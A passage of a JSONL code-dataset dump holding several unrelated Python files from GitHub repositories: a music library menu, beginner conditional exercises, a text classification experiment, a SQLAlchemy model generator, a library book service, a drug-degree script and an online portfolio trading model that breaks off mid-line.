display_menu():\n os.system(\"clear\")\n print_ascii_art.print_starting_art()\n loop = True\n while loop:\n albums_list = []\n albums_list = music_reports.import_library(albums_list)\n choice = input(\"\"\"\n1: View all imported albums\n2: Find albums by genre\n3: Find albums from given time range\n4: Find shortest/longest album\n5: Find albums created by given artist\n6: Find album by name\n7: Generate full report\n8: Add new album\n9: Delete album\n10: Exit\n What you want to do? \"\"\")\n\n if choice == \"1\":\n os.system(\"clear\")\n music_reports.drawing_table(albums_list)\n\n elif choice == \"2\":\n os.system(\"clear\")\n music_reports.find_by_genre(albums_list)\n\n elif choice == \"3\":\n loop2 = True\n while loop2:\n os.system(\"clear\")\n search_by_year_option = input(\"\"\"\n1: Search for albums made in given year\n2: Search for albums made between years (yyyy-yyyy)\n What you want to do? \"\"\")\n\n if search_by_year_option == \"1\":\n os.system(\"clear\")\n music_reports.find_albums_made_in_given_year(albums_list)\n loop2 = False\n\n elif search_by_year_option == \"2\":\n os.system(\"clear\")\n music_reports.find_albums_made_between_years(albums_list)\n loop2 = False\n\n else:\n os.system(\"clear\")\n print(\"Next time please enter '1' or '2'\")\n time.sleep(3)\n os.system(\"clear\")\n continue\n\n elif choice == \"4\":\n os.system(\"clear\")\n loop3 = True\n while loop3:\n search_shortest_longest_album = input(\"\"\"\n1: Search for longest album\n2: Search for shortest album\n What you want to do? \"\"\")\n if search_shortest_longest_album == \"1\":\n os.system(\"clear\")\n music_reports.find_longest_album(albums_list)\n loop3 = False\n\n elif search_shortest_longest_album == \"2\":\n os.system(\"clear\")\n loop3 = False\n music_reports.find_shortest_album(albums_list)\n\n else:\n os.system(\"clear\")\n print(\"Next time please enter '1' or '2'\")\n time.sleep(3)\n os.system(\"clear\")\n continue\n\n elif choice == \"5\":\n os.system(\"clear\")\n music_reports.find_by_artist(albums_list)\n\n elif choice == \"6\":\n os.system(\"clear\")\n music_reports.find_by_name(albums_list)\n\n elif choice == \"7\":\n os.system(\"clear\")\n music_reports.find_longest_album(albums_list)\n music_reports.find_shortest_album(albums_list)\n music_reports.oldest_or_youngest_album(albums_list, \"youngest\")\n music_reports.oldest_or_youngest_album(albums_list, \"oldest\")\n music_reports.amount_of_albums(albums_list)\n music_reports.albums_by_genres(albums_list)\n\n elif choice == \"8\":\n os.system(\"clear\")\n music_reports.add_album()\n\n elif choice == \"9\":\n os.system(\"clear\")\n music_reports.drawing_table(albums_list)\n music_reports.delete_album(albums_list)\n\n elif choice == \"10\":\n os.system(\"clear\")\n print_ascii_art.print_ending_art()\n loop = False\n\n else:\n os.system(\"clear\")\n print(\"Please enter numbers from 1 to 10: \")\n\n\ndef main():\n os.system(\"clear\")\n display_menu()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"MichalPula/MusicLibrary","sub_path":"display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":3903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"7953565873","text":"def diff21(n):\r\n if (n > 21): \r\n return (2 * (abs(n - 21)))\r\n else: \r\n return (abs(n - 21))\r\n\r\ndef fix_teen(n):\r\n if (n >= 13 and n <= 19) and (n != 15 and n != 16):\r\n return 0\r\n else:\r\n return n\r\n\r\ndef no_teen_sum(a, b, c):\r\n return fix_teen(a) + fix_teen(b) + fix_teen(c)\r\n \r\ndef sorta_sum(a, b):\r\n if (a + b >= 10 and a + b <= 19):\r\n return 20\r\n else: return a + b\r\n\r\ndef lone_sum(a, b, c):\r\n if a == b and b == c:\r\n return 0\r\n elif a == b:\r\n return c\r\n elif a == c:\r\n return b\r\n elif b == c:\r\n return a\r\n else: return a + b + c\r\n \r\ndef lucky_sum(a, b, c):\r\n if a == 13:\r\n return 0\r\n elif b == 13:\r\n return a\r\n elif c == 13:\r\n return a + b\r\n else: return a + b + c\r\n \r\ndef round10(num):\r\n if (num % 10 >= 5):\r\n return ((num / 10) + 1) * 10\r\n else: return ((num / 10) * 10)\r\n\r\ndef round_sum(a, b, c):\r\n return round10(a) + round10(b) + round10(c)\r\n\r\ndef make_bricks(small, big, goal):\r\n if big == 0:\r\n return goal <= small\r\n elif small == 0 and big != 0:\r\n return goal % 5 == 0\r\n elif (small) + (big * 5) < goal:\r\n return False\r\n elif (goal % 5) <= small:\r\n return True\r\n else:\r\n return False\r\n\r\ndef close_far(a, b, c):\r\n if ((abs(b - a)) <= 1 and ((abs(c - a)) >= 2 and (abs(c - b))) >= 2):\r\n return True\r\n elif (abs(c - a)) <= 1 and (abs(b - a)) >= 2 and (abs(b - c)) >= 2:\r\n return True\r\n else: return False\r\n \r\ndef magicPair(a,b):\r\n if b < 10:\r\n if (a / 10) == b:\r\n if (a / 10) + b == (a % 10):\r\n return True\r\n if (a % 10) == b:\r\n if (a % 10) + b == (a / 10):\r\n return True\r\n else:\r\n if (a / 10) == (b / 10):\r\n if (a / 10) + (b / 10) == (a % 10) + (b % 10):\r\n return True\r\n if (a % 10) == (b % 10):\r\n if (a % 10) + (b % 10) == (a / 10) + (b / 10):\r\n return True\r\n if (a / 10) == (b % 10):\r\n if (a / 10) + (b % 10) == (a % 10) + (b / 10):\r\n return True\r\n else: return False\r\n if (a % 10) == (b / 10):\r\n if (a % 10) + (b / 10) == (a / 10) + (b % 10):\r\n return True\r\n if (a / 100) == (b / 10):\r\n if (a / 100) + (b / 10) == ((a / 10) % 10) + ((a % 100) % 10):\r\n return True\r\n if ((a % 100) % 10) == (b / 10):\r\n if ((a % 100) % 10) + (b / 10) == ((a / 10) % 10) + (b % 10):\r\n return True\r\n else: return False\r\n else: return False","repo_name":"rickey-dong/introcs","sub_path":"intro1/conditionals.py","file_name":"conditionals.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"25058221450","text":"from __future__ import print_function\nfrom __future__ import division\nimport logging, os\nimport numpy as np\nfrom utils.optparse import Arguments as arguments\nfrom canon60 import tfidf\nfrom data import process\nfrom sklearn.metrics import confusion_matrix, f1_score, accuracy_score, precision_score, recall_score\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\ndef prepare():\n \"\"\"\n Logging and arguments\n :return:\n \"\"\"\n\n # Logger\n logger = logging.getLogger(__name__)\n logger.setLevel(logging.INFO)\n ch = logging.StreamHandler()\n # --- keep this logger at DEBUG level, until aguments are processed\n ch.setLevel(logging.INFO)\n formatter = logging.Formatter(\n \"%(asctime)s - %(module)s - %(levelname)s - %(message)s\"\n )\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n\n # --- Get Input Arguments\n in_args = arguments(logger)\n opts = in_args.parse()\n\n fh = logging.FileHandler(opts.log_file, mode=\"a\")\n fh.setLevel(logging.INFO)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n # --- restore ch logger to INFO\n ch.setLevel(logging.INFO)\n\n return logger, opts\n\n\n\ndef evaluate(y_test, pred):\n acc = accuracy_score(y_test, pred)\n f1_micro = f1_score(y_test, pred, average='micro')\n p_micro = precision_score(y_test, pred, average='micro')\n r_micro = recall_score(y_test, pred, average='micro')\n\n f1_macro = f1_score(y_test, pred, average='macro')\n p_macro = precision_score(y_test, pred, average='macro')\n r_macro = recall_score(y_test, pred, average='macro')\n\n return acc, f1_macro, p_macro, r_macro\n\n\ndef main():\n \"\"\"\n Starts all\n :return:\n \"\"\"\n logger, opts = prepare()\n logger.info(\"---- CANON60 ----\")\n train_path = opts.i + \"/train\"\n test_path = opts.i + \"/test\"\n dt_train = process.canon60Dataset(train_path, join_all=True)\n dt_test = process.canon60Dataset(test_path, join_all=True)\n\n x_train = dt_train.X\n y_train = dt_train.y\n fnames_train = dt_train.fnames\n\n x_test = dt_test.X\n y_test = dt_test.y\n fnames_test = dt_test.fnames\n vocab = process.read_vocab_list(opts.vocab_path)\n logger.info(\"Results\")\n modelos = [\"FF\", ]\n representation = [\"tfidf\", ]\n max_features = [500,1000,2000,5000,10000,15000, 20000,len(vocab)]\n # max_features = [500,10000]\n min_ngrams = [1]\n max_ngram = [2,3,4,5,6,7,8,9]\n # max_ngram = [3,4]\n\n\n for model_type in modelos:\n for repren in representation:\n model_type_name = model_type+\"_\"+repren\n logger.info(\"Clasificador: {}\".format(model_type_name))\n file = open(\"{}/{}\".format(opts.work_dir, model_type_name), \"w\")\n file.write(\"classifier,max_features,min_ngram,max_ngram,accuracy,f1_macro,precision_macro,recall_macro\\n\")\n opts.model = model_type\n for max_feat in max_features:\n\n for min_ngram in min_ngrams:\n for up in max_ngram:\n rep = TfidfVectorizer(ngram_range=(min_ngram, up), max_features=max_feat, vocabulary=vocab[:max_feat])\n texts_rep_train = rep.fit_transform(x_train)\n texts_rep_train = texts_rep_train.toarray()\n text_test_rep = rep.transform(x_test)\n text_test_rep = text_test_rep.toarray()\n logger.info(texts_rep_train.shape)\n logger.info(text_test_rep.shape)\n\n model = tfidf.Model(texts_rep_train, y_train, text_test_rep, y_test,fnames_train,fnames_test,\n layers=opts.layers,\n logger=logger, opts=opts)\n\n pred, y_true = model.get_results()\n # pred, y_true = results[0], results[2]\n\n acc, f1_macro, p_macro, r_macro = evaluate(y_true, pred)\n # acc, f1_macro, p_macro, r_macro = random.random(), random.random(), random.random(), random.random()\n res = \"{},{},{},{},{},{},{},{}\\n\".format(model_type, max_feat, min_ngram, up, acc, f1_macro, p_macro, r_macro)\n\n logger.info(res)\n file.write(res)\n file.flush()\n file.close()\n\n logger.info(\"---- FIN ----\")\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"JoseRPrietoF/autoria","sub_path":"canon60_results_NN.py","file_name":"canon60_results_NN.py","file_ext":"py","file_size_in_byte":4407,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"34181377967","text":"from os import path, getcwd\nfrom pathlib import Path\nfrom shutil import copyfile, copytree\nfrom typing import Optional\n\nfrom modelgen.helper import Helper\nfrom modelgen import (__file__, constants, Validate, Parser, \n Template, alchemygen, metagen, walk)\n\nclass ModelGenerator(Helper):\n\n def __init__(self, init: Optional[str]=False, createmodel: bool=False, \n file: str=None, alembic: bool=False,**kwargs):\n '''\n This class is initialized by taking in the argument values \n passed from the cli. \n\n Args: \n init (Optional[str] or False): init is set to true if \n --init is called from the cli and a folder name is\n passed. The folder name has to be new, if an existing\n folder name is passed, an exception will be raised\n asking to pass a new folder name/path. \n If init is not called from cli, it is set to False \n by default.\n\n createmodel (bool): createmodel is set to true if \n --createmodel is called from the command line.\n --createmodel also needs another argument\n -f or --file which points to the path of the \n schema yaml file. This file will be used to create\n sqlalchemy model code in python\n\n file (str): filepath of the yaml schema template file.\n \n alembic (bool): if set, alembic support will be set\n to true. A folder named metadata will be created\n with an __init__.py. This py file will have the\n sqlalchemy metadata imported from the file \n generated by the createmodel command.\n '''\n Helper.__init__(self)\n self.create_structure(init=init)\n self.create_models(createmodel=createmodel, file=file, alembic=alembic) \n\n def _create_template_folder(self, **kwargs) -> bool:\n '''\n Create a folder called `templates`. This folder contains an\n example schema template file required to get started.\n\n Returns bool, True if creation is successful, False otherwise. \n '''\n try:\n init = kwargs.get('init')\n templates_src_path = path.join('/',*(__file__.split('/')[:-1]),'templates')\n templates_dst_path = path.join(init, 'templates')\n if path.exists(templates_dst_path):\n raise FileExistsError\n self.logger.info(f'Creating templates folder at {templates_dst_path}')\n Path(templates_dst_path).mkdir(parents=True, exist_ok=False)\n self.logger.debug('Templates folder creation successful')\n self.logger.info(f'Creating an example yaml schema file at {templates_dst_path}/example.yaml')\n copyfile((path.join(templates_src_path, 'example.yaml')), \n path.join(templates_dst_path, 'example.yaml'))\n return True\n except FileExistsError as e:\n self.logger.exception('Error occurred while creating templates folder')\n self.logger.exception(e)\n raise FileExistsError(\"Folder exists. Please specify a new folder name\") from FileExistsError \n\n def _create_alembic_folder(self, **kwargs):\n '''\n This function is responsible for creating alembic's \n folder structure. The folder created is named `alembic`.\n This folder contains files __init__.py, evn.py, README,\n script.py.mako and a folder named `versions`. This folder\n stores version files for every table level change made.\n\n Returns bool, True if folder creation is successful,\n False otherwise.\n '''\n try:\n init = kwargs.get('init')\n if path.isabs(init):\n dst_path = path.join(init)\n else:\n dst_path = path.join(getcwd(), init)\n if path.exists(dst_path):\n raise FileExistsError\n alembic_path = path.join('/',*(__file__.split('/')[:-1]),'alembic_migrate')\n self.logger.info(f'Creating alembic folder at {dst_path}')\n ini_src_path = path.join('/',*(__file__.split('/')[:-1]),'alembic.ini')\n copytree(alembic_path, path.join(dst_path, 'alembic_migrate'))\n # Path(path.join(self.dst_path, 'alembic','versions')).mkdir(parents=True, exist_ok=False)\n copyfile(ini_src_path, path.join(dst_path, 'alembic.ini'))\n return True\n except FileExistsError as e:\n self.logger.exception('Error occurred while creating alembic folder')\n self.logger.exception(e)\n raise FileExistsError(\"Folder exists. Please specify a new folder name\") from FileExistsError \n\n def _create_checkpoint_file(self, **kwargs) -> bool:\n '''\n Create a checkpoint file in the folder name/path\n passed while initializing modelgen. The file created\n is named `.modelgen`. This file let's the program know\n that modelgen has been initialized in the directory\n\n Returns bool, True if successful, False otherwise.\n '''\n init = kwargs.get('init')\n self.write_to_file(path=path.join(init, '.modelgen'), data='')\n return True\n\n def _find_checkpoint_file(self) -> bool:\n '''\n Check if the checkpoint file `.modelgen` exists in\n the directory or not. This function is run before \n creating the sqlalchemy python code.\n\n Returns bool, True if file exists, False if file\n doesn't exist.\n '''\n chkpnt_filepath = path.join(getcwd(), '.modelgen')\n if not path.exists(chkpnt_filepath):\n err_str = 'Either modelgen is not initialized, or you are in the wrong folder\\n'\n err_str += 'Please initialize modelgen (modelgen --source yaml --init ./YOUR_FOLDER_NAME)'\n err_str += ' or execute commands from /path/YOUR_FOLDER_NAME'\n raise FileNotFoundError(err_str)\n else:\n return True\n\n def _create_model(self, datasource: str, alembic: bool=False, \n filepath: str=None) -> bool:\n '''\n Create sqlalchemy code, based on the schema\n defined in the yaml schema template file. The code files\n are created in a folder called `models` and the files\n are created by the datasource name. Example: if the datasource \n name is inventory, the model file will be \n `models/inventory.py`.\n\n Args:\n datasource (str): name of the datasource.\n This is defined by the name of the\n schema template yaml file. \n for example, if the schema file is named \n inventory.yaml, the datasource name will be \n inventory\n\n alembic (bool, default: False): If set to True,\n python code to support alembic migrations \n will also be created.\n\n filepath (str, default: None): filepath of the\n schema template yaml file. If nothing is passed,\n a path will be constructed using current directory\n and the datasource name. This consturcted path\n will be current_working_dir/templates/datasource.yaml\n\n Returns:\n (bool): True, if sqlalchemy model code generation is successful\n False, if sqlalchemy model code generation fails\n '''\n if not filepath:\n filepath = path.join(constants.templates_folder, f\"{datasource}.yaml\")\n Validate(filepath=filepath).validate()\n parser = Parser(filepath=filepath)\n src_template = Template(alchemygen)\n py_code = src_template.render(datasource=datasource,yaml_data=parser.data, cst=constants, bool=bool)\n Path(constants.models_folder).mkdir(parents=True, exist_ok=True)\n py_filepath = path.join(constants.models_folder, f'{datasource}.py')\n self.write_to_file(path=py_filepath, data=py_code)\n if alembic:\n self._create_alembic_meta()\n return True\n\n def _create_alembic_meta(self) -> bool:\n '''\n Creates code required to support alembic migrations.\n The code is created in a folder `metadata`. A file\n named __init__.py is created in the `metadata` folder\n which imports the sqlalchemy metadata from all the models\n sitting in the `models` folder.\n\n Returns bool, True if code creation is successful,\n False if code creation fails.\n '''\n alembic_template = Template(metagen)\n _, _, filenames = next(walk(constants.models_folder))\n alembic_meta = alembic_template.render(filenames=filenames, cst=constants,\n splitext=path.splitext)\n Path(constants.alembic_meta_folder).mkdir(parents=True, exist_ok=True)\n alembic_meta_filepath = path.join(constants.alembic_meta_folder, '__init__.py')\n self.write_to_file(path=alembic_meta_filepath, data=alembic_meta)\n return True\n\n def create_structure(self, init: bool=False) -> bool:\n if bool(init):\n self._create_alembic_folder(init=init)\n self._create_template_folder(init=init)\n self._create_checkpoint_file(init=init)\n return True\n return None\n\n def create_models(self, createmodel: bool=False, file: str=None, alembic: bool=False) -> bool:\n if bool(createmodel) and bool(file):\n if file.endswith('.yaml'):\n datasource = file.split('.yaml')[0].split('/')[-1]\n elif file.endswith('yml'):\n datasource = file.split('.yml')[0].split('/')[-1]\n else:\n raise NameError('Please specify a .yaml or .yml file')\n self._find_checkpoint_file()\n self.logger.info(f\"Creating models at {file}\")\n self._create_model(datasource=datasource, alembic=alembic)\n return True\n return None","repo_name":"shrinivdeshmukh/sqlalchemy-modelgen","sub_path":"modelgen/modelgenerator.py","file_name":"modelgenerator.py","file_ext":"py","file_size_in_byte":10052,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"94"} +{"seq_id":"23880907983","text":"from Project.____Domain.Entities.Book import Book\nfrom Project.____Domain.Validators.Validator import Validator\nfrom Project._____Utils.Exceptions import bookNotInMemError, duplicatedBookError, noBooksInMemError, shouldNotBeRaisedError\nfrom Project.___Repository.BookRepo import BookRepository\nclass BookService:\n def __init__(self, bookRepo, validator):\n \"\"\"\n initializeaza un nou service pentru carti care are acces la repositoriul de carti si la un validator\n :param bookRepo: repositoriul cu carti\n :param validator: validatorul de obiecte\n \"\"\"\n self.__bookRepo = bookRepo\n self.__validator = validator\n\n def adauga_carte(self, title, author, description, k_copies=1):\n \"\"\"\n adauga o carte nou in memorie\n :param title: str: titlu\n :param author: str: autor\n :param description: str: descriere\n :param k_copies: int: nr exemplare\n :return: none\n :raises: duplicatedBookError daca cartea e deja in memorie\n \"\"\"\n new_book = Book(title, author, description, k_copies)\n self.__validator.validateBook(new_book)\n\n book_in_memory = self.__bookRepo.find(new_book)\n if book_in_memory is not None:\n raise duplicatedBookError\n\n self.__bookRepo.append(new_book)\n def sterge_carte(self, title, author):\n \"\"\"\n sterge o carte din memorie\n :param title: str: titlu\n :param author: str: autor\n :return: none\n :raises: bookNotInMemError daca cartea nu e in memorie\n \"\"\"\n new_book = Book(title, author)\n self.__validator.validateBook(new_book)\n\n book_in_memory = self.__bookRepo.find(new_book)\n if book_in_memory is None:\n raise bookNotInMemError\n\n self.__bookRepo.remove(book_in_memory)\n def modifica_carte(self, title, author, newTitle=None, newAuthor=None, new_k_copies=None, new_desc=None):\n \"\"\"\n modifica un camp dintr-o carte din memorie\n :param title: str: titlu\n :param author: str: autor\n :param newTitle: str: titlu nou\n :param newAuthor: str: autor nou\n :param new_k_copies: int: nr exemplare nou\n :param new_desc: str: descriere noua\n :return: none\n :raises: bookNotInMemError daca cartea nu e in memorie\n \"\"\"\n new_book = Book(title, author)\n self.__validator.validateBook(new_book)\n\n book_in_memory = self.__bookRepo.find(new_book)\n if book_in_memory is None:\n raise bookNotInMemError\n\n self.__bookRepo.remove(book_in_memory)\n if newTitle is not None:\n try_book = Book(newTitle, author)\n self.__validator.validateBook(try_book)\n if self.__bookRepo.find(try_book) is not None:\n raise duplicatedBookError\n\n book_in_memory.setTitle(newTitle)\n elif newAuthor is not None:\n try_book = Book(title, newAuthor)\n self.__validator.validateBook(try_book)\n if self.__bookRepo.find(try_book) is not None:\n raise duplicatedBookError\n\n book_in_memory.setAuthor(newAuthor)\n elif new_k_copies is not None:\n book_in_memory.setTotalCopies(new_k_copies)\n elif new_desc is not None:\n book_in_memory.setDescription(new_desc)\n else:\n raise shouldNotBeRaisedError\n self.__bookRepo.append(book_in_memory)\n\n def cauta_exemplare_carte(self, title, author):\n \"\"\"\n returneaza numarul de exemplare dintr-o carte\n :param title: str: titlu\n :param author: str: autor\n :return: int: nr exemplare\n :raises: bookNotInMemError daca cartea nu exista in memorie\n \"\"\"\n new_book = Book(title, author)\n self.__validator.validateBook(new_book)\n\n book_in_memory = self.__bookRepo.find(new_book)\n if book_in_memory is None:\n raise bookNotInMemError\n\n k_copies = book_in_memory.getTotalCopies()\n return k_copies\n # def raport_carti_inchiriate(self):\n # \"\"\"\n # creeaza un raport cu cartile sortate dupa nr de inchirieri\n # :return: str: un text cu toate cartile sortate\n # \"\"\"\n # if len(self.__bookRepo.getAll()) == 0:\n # raise noBooksInMemError\n #\n # self.__bookRepo.sort_by(byBorrows=1, reverse=True)\n # raport = self.__bookRepo.get_report()\n # return raport\n\n\n# def test_adauga_carte():\n# validator = Validator()\n# bookRepository = BookRepository()\n# bookService = BookService(bookRepository, validator)\n# bookService.adauga_carte(\"Ana\", \"Maria\", \"pisici\", 10)\n#\n# assert len(bookRepository.getAll()) == 1\n#\n# try:\n# bookService.adauga_carte(\"Ana\", \"Maria\", \"pisici\", 10)\n# assert False\n# except duplicatedBookError:\n# assert True\n# def test_sterge_carte():\n# validator = Validator()\n# bookRepository = BookRepository()\n# bookService = BookService(bookRepository, validator)\n# bookService.adauga_carte(\"Ana\", \"Maria\", \"pisici\", 10)\n# bookService.sterge_carte(\"Ana\", \"Maria\")\n#\n# assert len(bookRepository.getAll()) == 0\n#\n# try:\n# bookService.sterge_carte(\"Ana\", \"Maria\")\n# assert False\n# except bookNotInMemError:\n# assert True\n# def test_modifica_carte():\n# validator = Validator()\n# bookRepository = BookRepository()\n# bookService = BookService(bookRepository, validator)\n# bookService.adauga_carte(\"Ana\", \"Maria\", \"pisici\", 10)\n#\n# bookService.modifica_carte(\"Ana\", \"Maria\", \"Pisici\")\n#\n# assert bookRepository.getAll()[0].getTitle() == \"Pisici\"\n#\n# try:\n# bookService.modifica_carte(\"Ana\", \"Maria\")\n# assert False\n# except bookNotInMemError:\n# assert True\n# def test_cautare():\n# validator = Validator()\n# bookRepository = BookRepository()\n# bookService = BookService(bookRepository, validator)\n# bookService.adauga_carte(\"Ana\", \"Maria\", \"pisici\", 10)\n#\n# assert bookService.cauta_exemplare_carte(\"Ana\", \"Maria\") == 10\n#\n# try:\n# bookService.sterge_carte(\"Ana\", \"nush\")\n# assert False\n# except bookNotInMemError:\n# assert True\n# def test_raport():\n# validator = Validator()\n# bookRepository = BookRepository()\n# bookService = BookService(bookRepository, validator)\n# bookService.adauga_carte(\"Ana\", \"Maria\", \"pisici\", 10)\n#\n# assert bookService.raport_carti_inchiriate() is not None\n#\n# try:\n# bookService.sterge_carte(\"Ana\", \"Maria\")\n# bookService.raport_carti_inchiriate()\n# assert False\n# except noBooksInMemError:\n# assert True\n#\n#\n# test_adauga_carte()\n# test_sterge_carte()\n# test_modifica_carte()\n# test_cautare()\n# test_raport()","repo_name":"beji02/College-projects-2021-2022","sub_path":"Python projects/Library manager/Project/__Controller/BookService.py","file_name":"BookService.py","file_ext":"py","file_size_in_byte":6831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"1015851493","text":"import pickle\nimport numpy as np\nimport scipy.sparse as sparseMatrix\n\ndef loadFiles():\n durgDict = {}\n drugidx = 0\n\n with open(\"word_dict.dict\", \"rb\") as f:\n wordDict = pickle.load(f)\n #get dimension\n dimension = 0\n for i in wordDict.items():\n if i[1] > dimension:\n dimension = i[1]\n f.close()\n\n print(\"word dict loaded.\")\n\n print(\"word dict inverse loaded.\")\n\n with open(\"drug_adr.dict\", \"rb\") as f:\n subDict = pickle.load(f)\n f.close()\n for i in subDict.keys():\n durgDict[i.strip().lower()] = drugidx\n drugidx += 1\n\n with open(\"/data/work/huaminz2/CS410/project/GuoShijie/word_matrix.matrix\", \"rb\") as f:\n matrix = pickle.load(f)\n f.close()\n print(\"doc dict loaded.\")\n print(\"matrix shape: \" + str(matrix.shape))\n print(\"=======Initialization completed========\")\n return matrix, wordDict, durgDict, dimension\n\ndef getDegree(matrix,drugDict,wordDict):\n rs = {}\n drugDegree = {}\n for drug in drugDict:\n idx = wordDict[drug]\n degree = len(matrix[idx].nonzero()[1])\n if degree >= 0:\n rs[drug] = idx\n drugDegree[drug] = degree\n rs = rs.items()\n drugDegree = drugDegree.items()\n rs = sorted(rs, key=lambda x: x[1])\n drugDegree = sorted(drugDegree, key=lambda x: x[1])\n return rs,drugDegree\n\n\nif __name__ == '__main__':\n matrix, wordDict, durgDict, dimension = loadFiles()\n rs, drugDegree = getDegree(matrix,durgDict,wordDict)\n #l = len(rs)\n rs = rs[0:99]\n drugDegree = drugDegree[0:99]\n for i in rs:\n print(i)\n fo = open(\"drug_degree.dict\", \"wb\")\n pickle.dump(drugDegree, fo)\n fo.close()\n","repo_name":"Lycbel/410ProjectFinal","sub_path":"Web/cs410/searchAlgorithm/checkdrug.py","file_name":"checkdrug.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"14035720489","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport pandas as pd\nimport pickle\n\nwith open('/var/www/html/information_theory/feima/uploads/s300.pkl', 'rb') as f:\n (stock_to_id, id_to_stock) = pickle.load(f)\n\nm = 300 # num of stocks we use\nmax_n = 6000\n\ndata_mat = np.ones((m, max_n))*-1\n\n_step = 0\nstep = 1\nall_step = 0\nB = []\nstock_state = np.zeros(m, dtype=int)\n\ntime_dict = {}\ndef time_to_id(time): \n global time_dict\n if time not in time_dict.keys():\n time_dict[time] = len(time_dict.keys())\n return time_dict[time]\n\ndef build_mat(ss, history_stock_data):\n global data_mat\n '''returns a m x s data matrix'''\n df = history_stock_data\n for ind, row in df.iterrows():\n s = row['Stock Code']\n if s not in stock_to_id.keys():\n continue\n t = str(row['Time'])\n p = row['Opening Price']\n s_id = stock_to_id[s]\n t_id = time_to_id(t)\n if s_id < m and t_id < max_n:\n data_mat[s_id, t_id] = p\n\ndef predict_next_x(P, index, w=5):\n t = index-1\n x = np.zeros(P.shape[1]) # x_t+1\n if index < w:\n w = index\n for k in range(m):\n cnt = 0\n for i in range(w):\n if P[t-i, k] > 0:\n x[k] += (P[t-i, k]/P[t, k]) # formula(1)\n cnt += 1\n if cnt > 0:\n x[k] /= cnt\n return x\n\ndef predict_next_b(B, P, mask, index, epsilon, w=5):\n t = index-1\n b_t = B[-1]\n x_t1 = predict_next_x(P, index, w)\n x_mean = np.mean(x_t1)\n #print(x_t1, x_mean)\n lam = max(0.0, (epsilon-np.dot(b_t,x_t1))/(np.linalg.norm(x_t1-x_mean)**2))\n lam = min(100000, lam)\n #print(lam)\n #print(x_t1 - x_mean)\n b_t1 = b_t + lam * (x_t1 - x_mean)\n res = simplex_proj(b_t1)*mask \n res *= 1/sum(res)\n return res #normalization\n\ndef simplex_proj(y):\n \"\"\" Projection of y onto simplex. \"\"\"\n m = len(y)\n bget = False\n\n s = sorted(y, reverse=True)\n tmpsum = 0.\n\n for ii in range(m-1):\n tmpsum = tmpsum + s[ii]\n tmax = (tmpsum - 1) / (ii + 1);\n if tmax >= s[ii+1]:\n bget = True\n break\n\n if not bget:\n tmax = (tmpsum + s[m-1] -1)/m\n \n return np.maximum(y-tmax,0.)\n\ndef update_state(money, mask, pv, bv):\n global stock_state\n #print(stock_state)\n old_state = stock_state\n all_money = money \n for k in range(m):\n if pv[k] > 0:\n all_money += pv[k] * stock_state[k]\n all_money = all_money*0.8\n new_state = np.zeros(m, dtype=int)\n for i in range(m):\n if pv[i] > 0:\n new_state[i] = int(all_money * bv[i] / pv[i])\n buy_code, buy_num, sell_code, sell_num = [], [], [], []\n for i in range(m):\n if i not in id_to_stock.keys():\n continue\n if new_state[i] < old_state[i] and mask[i] == 1:\n sell_code.append(id_to_stock[i])\n sell_num.append(old_state[i] - new_state[i])\n if new_state[i] > old_state[i] and mask[i] == 1:\n buy_code.append(id_to_stock[i])\n buy_num.append(new_state[i] - old_state[i])\n stock_state = new_state\n #print(buy_code)\n return sell_code, sell_num, buy_code, buy_num\n\ndef invest(data_mat, n, money, mask, w=1, epsilon=1.00001):\n global B\n \n P = data_mat\n '''\n X = np.ones_like(P)\n for i in range(m):\n for j in range(1, n):\n X[i, j] = P[i, j] / P[i, j-1]\n '''\n P = P.transpose()\n #print(P)\n \n if n == 0:\n B.append(np.array([1/m for i in range(m)]))\n else:\n b = predict_next_b(B, P, mask, n, epsilon, w)\n B.append(b)\n #print('B:', B[-1])\n sell_code, sell_num, buy_code, buy_num = update_state(money, mask, P[n], B[-1])\n return sell_code, sell_num, buy_code, buy_num\n\ndef get_avail(hist, tt):\n mask = np.zeros(m)\n for ind, row in hist.iterrows():\n s = row['Stock Code']\n t = row['Time']\n p = row['Opening Price']\n if s not in stock_to_id.keys():\n continue\n s_id = stock_to_id[s]\n if tt == t:\n mask[s_id] = 1\n return mask\n \ndef model(s, money, history_stock_data, investment_data):\n #path='/var/www/html/information_theory/feima/test_data.csv'\n global _step, all_step\n all_step += 1\n \n w=5\n epsilon=1.000000001\n \n if _step > 0 or all_step > 10:\n _step -= 1\n add_data=pd.DataFrame(columns=['Time','Stocks you sell','Corresponding number of stocks you sell',\n 'Stocks you buy','Corresponding number of stocks you buy']) \n add_data=add_data.append({'Time': s}, ignore_index=True)\n return add_data\n \n ss = str(s)\n history_stock_data = history_stock_data[-w*520:]\n history_stock_data = history_stock_data.loc[history_stock_data['Time'] == s]\n build_mat(ss, history_stock_data)\n \n _step = step-1\n mask = get_avail(history_stock_data, s)\n sell_code, sell_num, buy_code, buy_num = invest(data_mat, time_to_id(ss), money, mask, w=w, epsilon=epsilon) \n \n add_data=pd.DataFrame(columns=['Time','Stocks you sell','Corresponding number of stocks you sell',\n 'Stocks you buy','Corresponding number of stocks you buy']) \n \n if len(sell_code) > 0 and len(buy_code) > 0:\n s1 = ', '.join([\"%d\"%(x) for x in sell_code])\n s2 = ', '.join([\"%d\"%(x) for x in sell_num])\n s3 = ', '.join([\"%d\"%(x) for x in buy_code])\n s4 = ', '.join([\"%d\"%(x) for x in buy_num])\n add_data=add_data.append({'Time': s,'Stocks you sell':s1,'Corresponding number of stocks you sell':s2,\n 'Stocks you buy':s3,'Corresponding number of stocks you buy':s4}, 